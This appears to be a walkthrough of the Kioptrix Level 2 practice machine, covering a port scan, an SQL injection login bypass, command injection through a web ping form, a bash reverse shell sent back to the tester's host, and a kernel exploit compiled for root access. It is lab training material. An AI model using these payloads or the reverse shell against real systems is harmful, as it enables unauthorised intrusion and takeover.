As usual I first started off with an nmap scan of the box:
root@kali:~# nmap -Pn -n 10.1.1.33
Nmap scan report for 10.1.1.33
Host is up (0.0051s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
631/tcp open ipp
3306/tcp open mysql
My first step after seeing port 80 open was to open up a web browser and browse to it.
After a bit of trial and error I found that the page is vulnerable to SQL
injection so I entered admin as the username and ' or '1'='1' --
(note the trailing space) as the password and…
Once logged in I was presented with a page that allowed me to ping other machines
on the network, so to escape the command to just ping a host I tried inserting
a ; after the host: 127.0.0.1; ls -lah which returned a directory
listing along with the ping output.
127.0.0.1; ls -lah
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.056 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.030 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.028 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.028/0.038/0.056/0.012 ms, pipe 2
drwxr-xr-x 2 root root 4.0K Oct 8 2009 .
drwxr-xr-x 8 root root 4.0K Oct 7 2009 ..
-rwxr-Sr-t 1 root root 1.7K Feb 9 2012 index.php
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php
This enabled me to run any commands I liked on the remote machine. So I sent
myself back a shell from the remote machine by setting up a listner on my box
with nc -lvp 8080 and then executing
127.0.0.1; bash -i >& /dev/tcp/192.168.1.116/8080 0>&1 from the webpage.
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
With this information and after a bit more prodding around on the remote machine
I found a kernel exploit, downloaded
it to the remote box using wget, compiled it then ran the exploit which returned
me a root shell.
bash-3.00$ gcc -o root root.c
sh: no job control in this shell
uid=0(root) gid=0(root) groups=48(apache)